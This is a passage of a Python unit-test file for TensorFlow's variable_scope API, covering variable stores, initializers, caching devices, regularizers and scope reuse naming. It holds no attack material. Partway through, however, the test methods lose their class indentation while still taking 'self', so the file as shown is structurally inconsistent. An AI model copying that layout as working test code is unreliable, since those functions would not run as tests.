v = variable_scope.get_variable("should_be_resource", [])
self.assertEqual(type(v), resource_variable_ops.ResourceVariable)
f()
  def testEagerVariableStore(self):
    """EagerVariableStore tracks (non-)trainable variables and deep-copies."""
    with context.eager_mode():
      store = variable_scope.EagerVariableStore()
      with store.as_default():
        v = variable_scope.get_variable("v", shape=(), trainable=True)
        w = variable_scope.get_variable("w", shape=(), trainable=False)
      self.assertTrue(v in store.variables())
      self.assertTrue(w in store.variables())
      self.assertTrue(v in store.trainable_variables())
      self.assertFalse(w in store.trainable_variables())
      self.assertFalse(v in store.non_trainable_variables())
      self.assertTrue(w in store.non_trainable_variables())

      # Test copying.
      new_store = store.copy()
      with new_store.as_default():
        # Same names resolve inside the copied store.
        new_v = variable_scope.get_variable("v")
        new_w = variable_scope.get_variable("w")
      self.assertEqual(new_v.numpy(), v.numpy())
      self.assertEqual(new_w.numpy(), w.numpy())
      self.assertTrue(new_v in new_store.variables())
      self.assertTrue(new_w in new_store.variables())
      self.assertTrue(new_v in new_store.trainable_variables())
      self.assertFalse(new_w in new_store.trainable_variables())
      self.assertFalse(new_v in new_store.non_trainable_variables())
      self.assertTrue(new_w in new_store.non_trainable_variables())

      # Check that variables are separate instances.
      # Assign different values to each store's variables and verify the
      # other store's values are unaffected.
      for v in store.variables():
        v.assign(-1)
      for v in new_store.variables():
        v.assign(1)
      for v in store.variables():
        self.assertEqual(v.numpy(), -1)
      for v in new_store.variables():
        self.assertEqual(v.numpy(), 1)
  def testEagerVariableStoreWithEagerDefun(self):
    """Dense layers built with _reuse=True inside a defun share variables."""
    with context.eager_mode():

      @function.defun
      def f():
        x = constant_op.constant([[2.0]])
        d1 = core_layers.Dense(
            1, name="my_dense", kernel_initializer=init_ops.ones_initializer())
        _ = d1(x)  # create variables
        self.assertEqual(len(d1.variables), 2)
        v1, v2 = d1.variables
        # Second layer with the same name and _reuse=True must pick up the
        # kernel/bias created by the first one rather than make new ones.
        d2 = core_layers.Dense(
            1,
            name="my_dense",
            kernel_initializer=init_ops.ones_initializer(),
            _reuse=True)
        _ = d2(x)
        self.assertEqual(len(d2.variables), 2)
        v3, v4 = d2.variables
        self.assertAllEqual([v1, v2], [v3, v4])

      f()
  @test_util.run_in_graph_and_eager_modes()
  def testInitFromNonTensorValue(self):
    """Python scalars and numpy arrays are accepted as initializers."""
    v = variable_scope.get_variable("v4", initializer=4, dtype=dtypes.int32)
    self.evaluate(variables_lib.variables_initializer([v]))
    self.assertAllClose(self.evaluate(v.value()), 4)
    w = variable_scope.get_variable(
        "w4", initializer=numpy.array([1, 2, 3]), dtype=dtypes.int64)
    self.evaluate(variables_lib.variables_initializer([w]))
    self.assertAllClose(self.evaluate(w.value()), [1, 2, 3])
    # A quirk to be revisited? Eager raises ValueError for an unsupported
    # initializer value, graph mode raises TypeError.
    error = ValueError if context.executing_eagerly() else TypeError
    with self.assertRaises(error):
      variable_scope.get_variable("x4", initializer={})
  @test_util.run_in_graph_and_eager_modes()
  def testInitFromNonInitializer(self):
    """Default initialization matches an explicit zeros initializer."""
    # Test various dtypes with zeros initializer as following:
    types = [
        dtypes.int8, dtypes.uint8, dtypes.int16, dtypes.uint16, dtypes.int32,
        dtypes.int64, dtypes.bool
    ]
    # Use different variable_name to distinguish various dtypes
    for (i, dtype) in enumerate(types):
      x = variable_scope.get_variable(
          name="xx%d" % i, shape=(3, 4), dtype=dtype)
      y = variable_scope.get_variable(
          name="yy%d" % i,
          shape=(3, 4),
          dtype=dtype,
          initializer=init_ops.zeros_initializer(dtype=dtype))
    self.evaluate(variables_lib.global_variables_initializer())
    # Only the last pair (x, y) is compared here after the loop.
    self.assertAllEqual(self.evaluate(x.value()), self.evaluate(y.value()))
  # TODO(alive): support variable partitioning/caching in eager mode.
  def testVarScopeCachingDevice(self):
    """caching_device inherits into child scopes and can be overridden."""
    with self.test_session():
      caching_device = "/job:moo"
      with variable_scope.variable_scope("tower"):
        with variable_scope.variable_scope(
            "caching", caching_device=caching_device):
          v = variable_scope.get_variable("v", [])
          self.assertTrue(v.value().device.startswith(caching_device))

          # Child scope inherits the caching device.
          with variable_scope.variable_scope("child"):
            v2 = variable_scope.get_variable("v", [])
            self.assertTrue(v2.value().device.startswith(caching_device))

          # Empty string disables caching for the nested scope.
          with variable_scope.variable_scope("not_cached", caching_device=""):
            v2_not_cached = variable_scope.get_variable("v", [])
            self.assertFalse(
                v2_not_cached.value().device.startswith(caching_device))

          # An identity callable effectively disables caching as well.
          with variable_scope.variable_scope(
              "not_cached_identity_device",
              caching_device=lambda op: op.device):
            v2_identity_device = variable_scope.get_variable("v", [])
            self.assertFalse(
                v2_identity_device.value().device.startswith(caching_device))

          # set_caching_device can also be applied to a live scope object.
          with variable_scope.variable_scope("we_will_do_it_live") as vs_live:
            vs_live.set_caching_device("/job:live")
            v_live = variable_scope.get_variable("v", [])
            self.assertTrue(v_live.value().device.startswith("/job:live"))

        # Outside the caching scope, no caching device applies.
        v_tower = variable_scope.get_variable("v", [])
        self.assertFalse(v_tower.value().device.startswith(caching_device))
  @test_util.run_in_graph_and_eager_modes()
  def testVarScopeRegularizer(self):
    """Scope regularizers add collection losses; no_regularizer disables."""
    init = init_ops.constant_initializer(0.3)

    def regularizer1(v):
      return math_ops.reduce_mean(v) + 0.1

    def regularizer2(v):
      return math_ops.reduce_mean(v) + 0.2

    with variable_scope.variable_scope(
        "tower3", regularizer=regularizer1) as tower:
      with variable_scope.variable_scope("foo", initializer=init):
        v = variable_scope.get_variable("v", [])
        self.evaluate(variables_lib.variables_initializer([v]))
        # One loss from regularizer1 on v: mean(0.3) + 0.1 = 0.4.
        losses = ops.get_collection(ops.GraphKeys.REGULARIZATION_LOSSES)
        self.assertEqual(1, len(losses))
        self.assertAllClose(self.evaluate(losses[0]), 0.4)
      with variable_scope.variable_scope(tower, initializer=init) as vs:
        u = variable_scope.get_variable("u", [])
        vs.set_regularizer(regularizer2)
        w = variable_scope.get_variable("w", [])
        # Next 3 variables not regularized to test disabling regularization.
        x = variable_scope.get_variable(
            "x", [], regularizer=variable_scope.no_regularizer)
        with variable_scope.variable_scope(
            "baz", regularizer=variable_scope.no_regularizer):
          y = variable_scope.get_variable("y", [])
        vs.set_regularizer(variable_scope.no_regularizer)
        z = variable_scope.get_variable("z", [])
        # Check results.
        losses = ops.get_collection(ops.GraphKeys.REGULARIZATION_LOSSES)
        self.assertEqual(3, len(losses))
        self.evaluate(variables_lib.variables_initializer([u, w, x, y, z]))
        self.assertAllClose(self.evaluate(losses[0]), 0.4)
        self.assertAllClose(self.evaluate(losses[1]), 0.4)
        self.assertAllClose(self.evaluate(losses[2]), 0.5)
      with variable_scope.variable_scope("foo", reuse=True):
        # reuse=True is for now only supported when eager execution is
        # disabled.
        if not context.executing_eagerly():
          v = variable_scope.get_variable("v",
                                          [])  # "v" is already there, reused
          losses = ops.get_collection(ops.GraphKeys.REGULARIZATION_LOSSES)
          self.assertEqual(3, len(losses))  # No new loss added.
  @test_util.run_in_graph_and_eager_modes()
  def testInitializeFromValue(self):
    """Tensor initializers fix the value, forbid shapes, and carry dtype."""
    init = constant_op.constant(0.1)
    w = variable_scope.get_variable("v", initializer=init)
    self.evaluate(variables_lib.variables_initializer([w]))
    self.assertAllClose(self.evaluate(w.value()), 0.1)

    with self.assertRaisesRegexp(ValueError, "shape"):
      # We disallow explicit shape specification when initializer is constant.
      variable_scope.get_variable("u", [1], initializer=init)

    with variable_scope.variable_scope("foo", initializer=init):
      # Constant initializer can be passed through scopes if needed.
      v = variable_scope.get_variable("v")
      self.evaluate(variables_lib.variables_initializer([v]))
      self.assertAllClose(self.evaluate(v.value()), 0.1)

    # Check that non-float32 initializer creates a non-float32 variable.
    init = constant_op.constant(1, dtype=dtypes.int32)
    t = variable_scope.get_variable("t", initializer=init)
    self.assertEqual(t.dtype.base_dtype, dtypes.int32)

    # Raise error if `initializer` dtype and `dtype` are not identical.
    with self.assertRaisesRegexp(ValueError, "don't match"):
      variable_scope.get_variable("s", initializer=init, dtype=dtypes.float64)
  def testControlDeps(self):
    """Variable initializers don't inherit surrounding control deps."""
    with self.test_session() as sess:
      v0 = variable_scope.get_variable(
          "v0", [1], initializer=init_ops.constant_initializer(0))
      with ops.control_dependencies([v0.value()]):
        v1 = variable_scope.get_variable(
            "v1", [1], initializer=init_ops.constant_initializer(1))
        add = v1 + v0
      # v0 should be uninitialized.
      with self.assertRaisesRegexp(errors.OpError, "uninitialized"):
        sess.run(v0)
      # We should be able to initialize and run v1 without initializing
      # v0, even if the variable was created with a control dep on v0.
      sess.run(v1.initializer)
      self.assertEqual(1, sess.run(v1))
      # v0 should still be uninitialized.
      with self.assertRaisesRegexp(errors.OpError, "uninitialized"):
        sess.run(v0)
      with self.assertRaisesRegexp(errors.OpError, "uninitialized"):
        sess.run(add)
      # If we initialize v0 we should be able to run 'add'.
      sess.run(v0.initializer)
      sess.run(add)
  def testControlFlow(self):
    """Variables created inside cond branches are independently usable."""
    with self.test_session() as sess:
      v0 = variable_scope.get_variable(
          "v0", [], initializer=init_ops.constant_initializer(0))
      var_dict = {}

      # Call get_variable in each of the cond clauses.
      def var_in_then_clause():
        v1 = variable_scope.get_variable(
            "v1", [1], initializer=init_ops.constant_initializer(1))
        var_dict["v1"] = v1
        return v1 + v0

      def var_in_else_clause():
        v2 = variable_scope.get_variable(
            "v2", [1], initializer=init_ops.constant_initializer(2))
        var_dict["v2"] = v2
        return v2 + v0

      add = control_flow_ops.cond(
          math_ops.less(v0, 10), var_in_then_clause, var_in_else_clause)
      # Both branch functions ran at graph-build time, so both variables
      # exist regardless of which branch executes.
      v1 = var_dict["v1"]
      v2 = var_dict["v2"]
      # We should be able to initialize and run v1 and v2 without initializing
      # v0, even if the variable was created with a control dep on v0.
      sess.run(v1.initializer)
      self.assertEqual([1], sess.run(v1))
      sess.run(v2.initializer)
      self.assertEqual([2], sess.run(v2))
      # v0 should still be uninitialized.
      with self.assertRaisesRegexp(errors.OpError, "uninitialized"):
        sess.run(v0)
      # We should not be able to run 'add' yet.
      with self.assertRaisesRegexp(errors.OpError, "uninitialized"):
        sess.run(add)
      # If we initialize v0 we should be able to run 'add'.
      sess.run(v0.initializer)
      sess.run(add)
  @test_util.run_in_graph_and_eager_modes()
  def testGetVariableScope(self):
    """get_variable_scope() returns a live, mutable scope object."""
    # Test the get_variable_scope() function and setting properties of result.
    init = init_ops.constant_initializer(0.3)
    with variable_scope.variable_scope("bar"):
      new_init1 = variable_scope.get_variable_scope().initializer
      self.assertEqual(new_init1, None)
      # Check that we can set initializer like this.
      variable_scope.get_variable_scope().set_initializer(init)
      v = variable_scope.get_variable("v", [])
      self.evaluate(variables_lib.variables_initializer([v]))
      self.assertAllClose(self.evaluate(v.value()), 0.3)
      if not context.executing_eagerly():
        # Check that we can set reuse.
        variable_scope.get_variable_scope().reuse_variables()
        with self.assertRaises(ValueError):  # Fail, w does not exist yet.
          variable_scope.get_variable("w", [1])
    # Check that the set initializer goes away.
    new_init = variable_scope.get_variable_scope().initializer
    self.assertEqual(new_init, None)
  @test_util.run_in_graph_and_eager_modes()
  def testVarScope(self):
    """Variable scope names nest and compose with name scopes."""
    with variable_scope.variable_scope("tower4") as tower:
      self.assertEqual(tower.name, "tower4")
      with ops.name_scope("scope") as sc:
        self.assertEqual(sc, "tower4/scope/")

    with variable_scope.variable_scope("tower5"):
      with variable_scope.variable_scope("bar") as bar:
        self.assertEqual(bar.name, "tower5/bar")
        with ops.name_scope("scope") as sc:
          self.assertEqual(sc, "tower5/bar/scope/")

    with variable_scope.variable_scope("tower6"):
      # Re-entering a captured scope keeps its variable-scope name, but
      # the surrounding name scope still prefixes op names.
      with variable_scope.variable_scope(tower, reuse=True) as tower_shared:
        self.assertEqual(tower_shared.name, "tower4")
        with ops.name_scope("scope") as sc:
          self.assertEqual(sc, "tower6/tower4/scope/")
  @test_util.run_in_graph_and_eager_modes()
  def testVarScopeNameScope(self):
    """Re-entered variable scopes get uniquified name-scope suffixes."""
    with ops.name_scope("testVarScopeNameScope1"):
      with variable_scope.variable_scope("tower") as tower:
        with ops.name_scope("scope2") as sc2:
          self.assertEqual(sc2, "testVarScopeNameScope1/tower/scope2/")
      if not context.executing_eagerly():
        with variable_scope.variable_scope(
            tower):  # Re-entering acts like another "tower".
          with ops.name_scope("scope2") as sc2:
            self.assertEqual(sc2, "testVarScopeNameScope1/tower_1/scope2/")
        with variable_scope.variable_scope(
            "tower"):  # Re-entering by string acts the same.
          with ops.name_scope("scope2") as sc2:
            self.assertEqual(sc2, "testVarScopeNameScope1/tower_2/scope2/")

    with ops.name_scope("testVarScopeNameScope2"):
      with variable_scope.variable_scope("tower"):
        with ops.name_scope("scope2") as sc2:
          self.assertEqual(sc2, "testVarScopeNameScope2/tower/scope2/")
      if not context.executing_eagerly():
        with variable_scope.variable_scope(tower):
          with ops.name_scope("scope2") as sc2:
            self.assertEqual(sc2, "testVarScopeNameScope2/tower_1/scope2/")

    root_var_scope = variable_scope.get_variable_scope()
    with ops.name_scope("testVarScopeNameScope3"):
      # The root scope contributes no name-scope prefix of its own.
      with variable_scope.variable_scope(root_var_scope):
        with ops.name_scope("scope2") as sc2:
          self.assertEqual(sc2, "testVarScopeNameScope3/scope2/")
def testVarScopeOriginalNameScope(self):
  """`original_name_scope` remembers where the scope was first created."""
  with self.test_session():
    with ops.name_scope("scope1"):
      with variable_scope.variable_scope("tower") as tower:
        self.assertEqual(tower.original_name_scope, "scope1/tower/")
        with ops.name_scope("scope2") as sc2:
          self.assertEqual(sc2, "scope1/tower/scope2/")
    with ops.name_scope("scope2"):
      with variable_scope.variable_scope(tower) as tower1:
        # Re-entering preserves original name scope.
        self.assertEqual(tower1.original_name_scope, "scope1/tower/")
        with ops.name_scope("foo") as sc2:
          self.assertEqual(sc2, "scope2/tower/foo/")
        # Test re-entering original name scope.
        with ops.name_scope(tower.original_name_scope):
          with ops.name_scope("bar") as sc3:
            self.assertEqual(sc3, "scope1/tower/bar/")
    with ops.name_scope("scope2"):
      with variable_scope.variable_scope(tower):
        with ops.name_scope(tower.original_name_scope):
          # "bar" was already used above, so the name is uniquified.
          with ops.name_scope("bar") as sc3:
            self.assertEqual(sc3, "scope1/tower/bar_1/")
def testVarScopeObjectReuse(self):
  """Re-entering a scope object inherits reuse; reuse=True is sticky."""
  with self.test_session():
    # Capture a scope that was opened with reuse=True.
    with variable_scope.variable_scope("jump", reuse=True) as scope:
      captured = scope
    with variable_scope.variable_scope(captured) as reentered:
      self.assertTrue(reentered.reuse)
    with variable_scope.variable_scope(captured, reuse=True) as reentered:
      self.assertTrue(reentered.reuse)
    # Passing reuse=False cannot undo an inherited reuse=True.
    with variable_scope.variable_scope(captured, reuse=False) as reentered:
      self.assertTrue(reentered.reuse)
    # Now capture a scope opened with reuse=False.
    with variable_scope.variable_scope("jump", reuse=False) as scope:
      captured = scope
    with variable_scope.variable_scope(captured) as reentered:
      self.assertFalse(reentered.reuse)
    with variable_scope.variable_scope(captured, reuse=True) as reentered:
      self.assertTrue(reentered.reuse)
    with variable_scope.variable_scope(captured, reuse=False) as reentered:
      self.assertFalse(reentered.reuse)
def testVarScopeGetOrCreateReuse(self):
  """AUTO_REUSE creates the variable on first use and reuses it afterwards."""
  with self.test_session():

    def assign_and_read(value):
      # Assign `value` into the AUTO_REUSE variable, fetch it back, and
      # check the round trip.
      x = constant_op.constant(value)
      with variable_scope.variable_scope(
          "testVarScopeGetOrCreateReuse_bar",
          reuse=variable_scope.AUTO_REUSE):
        _ = state_ops.assign(variable_scope.get_variable("var", []), x)
      with variable_scope.variable_scope(
          "testVarScopeGetOrCreateReuse_bar",
          reuse=variable_scope.AUTO_REUSE):
        _ = variable_scope.get_variable("var", [])
      self.assertEqual(value, x.eval())

    # The first call creates the variable; the later calls reuse it.
    for value in (42., 13., 17.):
      assign_and_read(value)
def testVarOpScope(self):
  """variable_scope(name, default_name) naming, reuse errors, uniquification."""
  with self.test_session():
    with ops.name_scope("testVarOpScope1"):
      with variable_scope.variable_scope("tower", "default", []):
        self.assertEqual(
            variable_scope.get_variable("w", []).name, "tower/w:0")
        with ops.name_scope("testVarOpScope2") as sc2:
          self.assertEqual(sc2, "testVarOpScope1/tower/testVarOpScope2/")
      # Opening "tower" again without reuse: creating "w" a second time fails.
      with variable_scope.variable_scope("tower", "default", []):
        with self.assertRaises(ValueError):
          variable_scope.get_variable("w", [])
        with ops.name_scope("testVarOpScope2") as sc2:
          self.assertEqual(sc2, "testVarOpScope1/tower_1/testVarOpScope2/")
    with ops.name_scope("testVarOpScope2"):
      # With name=None the default_name is used and uniquified per use.
      with variable_scope.variable_scope(None, "default", []):
        self.assertEqual(
            variable_scope.get_variable("w", []).name, "default/w:0")
        with ops.name_scope("testVarOpScope2") as sc2:
          self.assertEqual(sc2, "testVarOpScope2/default/testVarOpScope2/")
      with variable_scope.variable_scope(None, "default", []):
        self.assertEqual(
            variable_scope.get_variable("w", []).name, "default_1/w:0")
        with ops.name_scope("testVarOpScope2") as sc2:
          self.assertEqual(sc2, "testVarOpScope2/default_1/testVarOpScope2/")
def testVarOpScopeUniqueNamesInterleavedSubstringScopes(self):
  """Uniquification of default names is exact, not prefix-based.

  "defaultScope" must not collide with the counter of "defaultScope1"
  even though one is a substring of the other.
  """
  with self.test_session():
    with variable_scope.variable_scope(None, "defaultScope1"):
      with variable_scope.variable_scope(None, "layer"):
        self.assertEqual(
            variable_scope.get_variable("w", []).name,
            "defaultScope1/layer/w:0")
    # Second use of the same default name gets suffix _1.
    with variable_scope.variable_scope(None, "defaultScope1"):
      with variable_scope.variable_scope(None, "layer"):
        self.assertEqual(
            variable_scope.get_variable("w", []).name,
            "defaultScope1_1/layer/w:0")
    # A different (substring) default name starts its own counter.
    with variable_scope.variable_scope(None, "defaultScope"):
      with variable_scope.variable_scope(None, "layer"):
        self.assertEqual(
            variable_scope.get_variable("w", []).name,
            "defaultScope/layer/w:0")
    # Third use of "defaultScope1" continues its counter at _2.
    with variable_scope.variable_scope(None, "defaultScope1"):
      with variable_scope.variable_scope(None, "layer"):
        self.assertEqual(
            variable_scope.get_variable("w", []).name,
            "defaultScope1_2/layer/w:0")
def testVarOpScopeUniqueNamesWithJump(self):
  """Default-name numbering keeps counting across an unrelated re-entry."""
  with self.test_session():
    with variable_scope.variable_scope("default") as default:
      with variable_scope.variable_scope(None, "layer"):
        self.assertEqual(
            variable_scope.get_variable("w", []).name, "default/layer/w:0")
      with variable_scope.variable_scope(None, "layer"):
        self.assertEqual(
            variable_scope.get_variable("w", []).name, "default/layer_1/w:0")
      # Re-enter the enclosing scope object ("the jump") without creating
      # anything in it.
      with variable_scope.variable_scope(default):
        pass
      # No matter the jump in the middle, unique numbering continues.
      with variable_scope.variable_scope(None, "layer"):
        self.assertEqual(
            variable_scope.get_variable("w", []).name, "default/layer_2/w:0")
def testVarOpScopeReuse(self):
  """Reusing an outer scope reuses variables but uniquifies the name scope."""
  with self.test_session():
    with variable_scope.variable_scope("outer") as outer:
      with variable_scope.variable_scope("tower", "default", []):
        self.assertEqual(
            variable_scope.get_variable("w", []).name, "outer/tower/w:0")
        with ops.name_scope("scope2") as sc2:
          self.assertEqual(sc2, "outer/tower/scope2/")
      with variable_scope.variable_scope(None, "default", []):
        self.assertEqual(
            variable_scope.get_variable("w", []).name, "outer/default/w:0")
        with ops.name_scope("scope2") as sc2:
          self.assertEqual(sc2, "outer/default/scope2/")
    # Re-entering `outer` with reuse=True: same variable names, but the
    # name scope becomes "outer_1/...".
    with variable_scope.variable_scope(outer, reuse=True) as outer:
      with variable_scope.variable_scope("tower", "default", []):
        self.assertEqual(
            variable_scope.get_variable("w", []).name, "outer/tower/w:0")
        with ops.name_scope("scope2") as sc2:
          self.assertEqual(sc2, "outer_1/tower/scope2/")
      with variable_scope.variable_scope(None, "default", []):
        self.assertEqual(
            variable_scope.get_variable("w", []).name, "outer/default/w:0")
        with ops.name_scope("scope2") as sc2:
          self.assertEqual(sc2, "outer_1/default/scope2/")
def testVarScopeGetVar(self):
  """get_variable creation, reuse, and shape/dtype mismatch errors.

  Covers: creating variables in nested scopes, reusing by scope object and
  by string name, the error when re-creating without reuse, and the errors
  when reusing with a different shape or dtype.
  """
  with self.test_session():
    with variable_scope.variable_scope("root"):
      with variable_scope.variable_scope("towerA") as tower_a:
        va = variable_scope.get_variable("v", [1])
        self.assertEqual(va.name, "root/towerA/v:0")
      with variable_scope.variable_scope(tower_a, reuse=True):
        va2 = variable_scope.get_variable("v", [1])
        self.assertEqual(va2, va)
      with variable_scope.variable_scope("towerB"):
        vb = variable_scope.get_variable("v", [1])
        self.assertEqual(vb.name, "root/towerB/v:0")
      # Re-opening "towerA" without reuse must not re-create "v".
      with self.assertRaises(ValueError):
        with variable_scope.variable_scope("towerA"):
          va2 = variable_scope.get_variable("v", [1])
      with variable_scope.variable_scope("towerA", reuse=True):
        va2 = variable_scope.get_variable("v", [1])
        self.assertEqual(va2, va)
      with variable_scope.variable_scope("foo"):
        with variable_scope.variable_scope("bar"):
          v = variable_scope.get_variable("v", [1])
          self.assertEqual(v.name, "root/foo/bar/v:0")
          # Jumping back to tower_a from a deeper scope still reuses va.
          with variable_scope.variable_scope(tower_a, reuse=True):
            va3 = variable_scope.get_variable("v", [1])
            self.assertEqual(va, va3)
      # reuse=True propagates into subscopes, where "baz/v" does not exist.
      with self.assertRaises(ValueError):
        with variable_scope.variable_scope(tower_a, reuse=True):
          with variable_scope.variable_scope("baz"):
            variable_scope.get_variable("v", [1])
      with self.assertRaises(ValueError) as exc:
        with variable_scope.variable_scope(tower_a, reuse=True):
          variable_scope.get_variable("v", [2])  # Different shape.
      # assertIn gives a useful message on failure, unlike
      # assertEqual(<bool>, True).
      self.assertIn("shape", str(exc.exception))
      with self.assertRaises(ValueError) as exc:
        with variable_scope.variable_scope(tower_a, reuse=True):
          variable_scope.get_variable("v", [1], dtype=dtypes.int32)
      self.assertIn("dtype", str(exc.exception))
def testVarScopeOuterScope(self):
  """Each re-entry of a captured scope gets a fresh name-scope suffix."""
  with self.test_session():
    with variable_scope.variable_scope("outer") as outer:
      pass
    # First re-entry: variables live under "outer", name scope is "outer_1".
    with variable_scope.variable_scope(outer):
      self.assertEqual(variable_scope.get_variable("w", []).name, "outer/w:0")
      with ops.name_scope("scope2") as sc2:
        self.assertEqual(sc2, "outer_1/scope2/")
      with variable_scope.variable_scope("default"):
        self.assertEqual(
            variable_scope.get_variable("w", []).name, "outer/default/w:0")
        with ops.name_scope("scope2") as sc2:
          self.assertEqual(sc2, "outer_1/default/scope2/")
    # Second re-entry (with reuse): name scope advances to "outer_2".
    with variable_scope.variable_scope(outer, reuse=True):
      self.assertEqual(variable_scope.get_variable("w", []).name, "outer/w:0")
      with ops.name_scope("scope2") as sc2:
        self.assertEqual(sc2, "outer_2/scope2/")
      with variable_scope.variable_scope("default", reuse=True):
        self.assertEqual(
            variable_scope.get_variable("w", []).name, "outer/default/w:0")
        with ops.name_scope("scope2") as sc2:
          self.assertEqual(sc2, "outer_2/default/scope2/")
def testVarScopeNestedOuterScope(self):
  """Re-entering a scope inside itself nests the name scope ("outer/outer")."""
  with self.test_session():
    with variable_scope.variable_scope("outer") as outer:
      with variable_scope.variable_scope(outer):
        self.assertEqual(
            variable_scope.get_variable("w", []).name, "outer/w:0")
        with ops.name_scope("scope2") as sc2:
          self.assertEqual(sc2, "outer/outer/scope2/")
        with variable_scope.variable_scope("default"):
          self.assertEqual(
              variable_scope.get_variable("w", []).name, "outer/default/w:0")
          with ops.name_scope("scope2") as sc2:
            self.assertEqual(sc2, "outer/default/scope2/")
      # Second nested re-entry is uniquified to "outer/outer_1".
      with variable_scope.variable_scope(outer, reuse=True):
        self.assertEqual(
            variable_scope.get_variable("w", []).name, "outer/w:0")
        with ops.name_scope("scope2") as sc2:
          self.assertEqual(sc2, "outer/outer_1/scope2/")
        with variable_scope.variable_scope("default", reuse=True):
          self.assertEqual(
              variable_scope.get_variable("w", []).name, "outer/default/w:0")
          with ops.name_scope("scope2") as sc2:
            self.assertEqual(sc2, "outer/default_1/scope2/")
def testVarOpScopeReuseParam(self):
  """Reuse via the reuse= parameter and via scope.reuse_variables()."""
  with self.test_session():
    with variable_scope.variable_scope("outer") as outer:
      with variable_scope.variable_scope("tower", "default", []):
        self.assertEqual(
            variable_scope.get_variable("w", []).name, "outer/tower/w:0")
        with ops.name_scope("scope2") as sc2:
          self.assertEqual(sc2, "outer/tower/scope2/")
      with variable_scope.variable_scope(None, "default", []):
        self.assertEqual(
            variable_scope.get_variable("w", []).name, "outer/default/w:0")
        with ops.name_scope("scope2") as sc2:
          self.assertEqual(sc2, "outer/default/scope2/")
    with variable_scope.variable_scope(outer) as outer:
      # Reuse requested explicitly on the subscope.
      with variable_scope.variable_scope("tower", "default", reuse=True):
        self.assertEqual(
            variable_scope.get_variable("w", []).name, "outer/tower/w:0")
        with ops.name_scope("scope2") as sc2:
          self.assertEqual(sc2, "outer_1/tower/scope2/")
      # Reuse switched on for the rest of the outer scope.
      outer.reuse_variables()
      with variable_scope.variable_scope(None, "default", []):
        self.assertEqual(
            variable_scope.get_variable("w", []).name, "outer/default/w:0")
        with ops.name_scope("scope2") as sc2:
          self.assertEqual(sc2, "outer_1/default/scope2/")
def testVarOpScopeReuseError(self):
  """reuse=True with only a default name (no scope to reuse) is an error."""
  with self.test_session():
    # Entering the scope itself raises, so the body is never reached.
    with self.assertRaises(ValueError), variable_scope.variable_scope(
        None, "default", reuse=True):
      self.assertEqual(
          variable_scope.get_variable("w", []).name, "outer/tower/w:0")
def testVarOpScopeOuterScope(self):
  """Re-entering a captured scope with a default_name argument."""
  with self.test_session():
    with variable_scope.variable_scope("outer") as outer:
      pass
    with variable_scope.variable_scope(outer, "default", []):
      self.assertEqual(variable_scope.get_variable("w", []).name, "outer/w:0")
      with ops.name_scope("scope2") as sc2:
        self.assertEqual(sc2, "outer_1/scope2/")
      with variable_scope.variable_scope(None, "default", []):
        self.assertEqual(
            variable_scope.get_variable("w", []).name, "outer/default/w:0")
        with ops.name_scope("scope2") as sc2:
          self.assertEqual(sc2, "outer_1/default/scope2/")
    with variable_scope.variable_scope(outer, "default", reuse=True):
      self.assertEqual(variable_scope.get_variable("w", []).name, "outer/w:0")
      with ops.name_scope("scope2") as sc2:
        self.assertEqual(sc2, "outer_2/scope2/")
      # Switch the outer scope itself to reuse for the nested default scope.
      outer.reuse_variables()
      with variable_scope.variable_scope(None, "default", []):
        self.assertEqual(
            variable_scope.get_variable("w", []).name, "outer/default/w:0")
        with ops.name_scope("scope2") as sc2:
          self.assertEqual(sc2, "outer_2/default/scope2/")
def testVarOpScopeNestedOuterScope(self):
  """Re-entering a scope (with default_name) from inside and outside itself."""
  with self.test_session():
    with variable_scope.variable_scope("outer") as outer:
      # Nested re-entry: name scope becomes "outer/outer".
      with variable_scope.variable_scope(outer, "default", []):
        self.assertEqual(
            variable_scope.get_variable("w", []).name, "outer/w:0")
        with ops.name_scope("scope2") as sc2:
          self.assertEqual(sc2, "outer/outer/scope2/")
      with variable_scope.variable_scope(None, "default", []):
        self.assertEqual(
            variable_scope.get_variable("w", []).name, "outer/default/w:0")
        with ops.name_scope("scope2") as sc2:
          self.assertEqual(sc2, "outer/default/scope2/")
    # Top-level re-entry with reuse: name scope is uniquified to "outer_1".
    with variable_scope.variable_scope(outer, "default", reuse=True):
      self.assertEqual(variable_scope.get_variable("w", []).name, "outer/w:0")
      with ops.name_scope("scope2") as sc2:
        self.assertEqual(sc2, "outer_1/scope2/")
      with variable_scope.variable_scope(None, "default", []):
        self.assertEqual(
            variable_scope.get_variable("w", []).name, "outer/default/w:0")
        with ops.name_scope("scope2") as sc2:
          self.assertEqual(sc2, "outer_1/default/scope2/")
def testBasicWhenAuxiliaryNameScopeIsFalse(self):
  """auxiliary_name_scope=False: variables get the scope prefix, ops do not."""
  with self.test_session():
    with variable_scope.variable_scope(
        "scope", auxiliary_name_scope=False) as scope:
      self.assertEqual(scope.original_name_scope, "")
      self.assertEqual(variable_scope.get_variable("w", []).name, "scope/w:0")
      # Plain ops are created in the surrounding (root) name scope.
      self.assertEqual(constant_op.constant([], name="c").name, "c:0")
    with variable_scope.variable_scope(scope, auxiliary_name_scope=False):
      self.assertEqual(scope.original_name_scope, "")
      self.assertEqual(
          variable_scope.get_variable("w1", []).name, "scope/w1:0")
      self.assertEqual(constant_op.constant([], name="c1").name, "c1:0")
    # Recheck: no "scope" name scope was created above, so this one is fresh.
    with ops.name_scope("scope"):
      self.assertEqual(constant_op.constant([], name="c").name, "scope/c:0")
    with variable_scope.variable_scope("outer"):
      with variable_scope.variable_scope(
          "inner", auxiliary_name_scope=False) as inner:
        self.assertEqual(inner.original_name_scope, "outer/")
        self.assertEqual(
            variable_scope.get_variable("w", []).name, "outer/inner/w:0")
        # Ops stay in "outer", not "outer/inner".
        self.assertEqual(constant_op.constant([], name="c").name, "outer/c:0")
      with variable_scope.variable_scope(
          inner, auxiliary_name_scope=False) as inner1:
        self.assertEqual(inner1.original_name_scope, "outer/")
        self.assertEqual(
            variable_scope.get_variable("w1", []).name, "outer/inner/w1:0")
        self.assertEqual(
            constant_op.constant([], name="c1").name, "outer/c1:0")
      # Recheck: no "inner" name scope was created above.
      with ops.name_scope("inner"):
        self.assertEqual(
            constant_op.constant([], name="c").name, "outer/inner/c:0")
def testCreatedByDefaultNameWhenAuxiliaryNameScopeIsFalse(self):
  """auxiliary_name_scope=False also works with default_name scopes."""
  with self.test_session():
    with variable_scope.variable_scope(
        None, default_name="default", auxiliary_name_scope=False) as scope:
      self.assertEqual(scope.original_name_scope, "")
      self.assertEqual(
          variable_scope.get_variable("w", []).name, "default/w:0")
